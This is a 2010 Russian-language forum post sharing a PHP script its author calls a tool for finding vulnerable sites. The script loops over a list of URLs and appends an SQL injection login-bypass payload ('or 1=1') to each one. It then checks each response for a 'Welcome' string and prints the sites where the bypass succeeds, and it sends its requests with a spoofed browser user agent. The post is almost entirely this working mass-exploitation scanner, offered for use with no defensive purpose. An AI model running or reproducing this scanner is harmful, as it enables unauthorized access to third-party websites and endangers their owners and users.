13.05.2010, 18:15
|
|
Постоянный
Регистрация: 26.07.2009
Сообщений: 321
Провел на форуме:
444589
Репутация:
123
|
|
PHP код:
<?php
//Скрипт для поиска уязвимых сайтов
//автор: phpdreamer
set_time_limit(0);
//имя файла, в котором список сайтов
$filename = 'sites.txt';
//строка в URL, для поиска уязвимых сайтов
$url = "?functions.php?login=1'+or+1=1/*";
//строка, которая будет на странице если сайт уязвим
$str = 'Добро пожаловать';
//читаем файл и проверяем все сайты
foreach(file($filename) as $site)
if(strpos(curlPage(trim($site) . $url) , $str ))
echo $site . '<br>';
function curlPage($url)
{
if( !function_exists('curl_init'))
die('На сервере не установлено или отключено расширение cURL. Скрипт завершил работу.');
$curl = curl_init();
curl_setopt($curl,CURLOPT_URL,$url);
curl_setopt($curl,CURLOPT_RETURNTRANSFER,true);
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,true);
curl_setopt($curl, CURLOPT_HTTPHEADER, array(
'Accept-Language: ru,en-us;q=0.7,en;q=0.3',
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8,application/json',
'User-Agent: Mozilla/5.0 (X11; U; Gentoo-Linux; ru; rv:1.9.2.3)socks-php-bot Gecko/20100404 Firefox/3.7.0 GTB7.0',
'Accept-Encoding: deflate',
'Accept-Charset: UTF-8,*'));
curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,300);
return curl_exec($curl);
}
Последний раз редактировалось phpdreamer; 13.05.2010 в 18:23..
|
|
|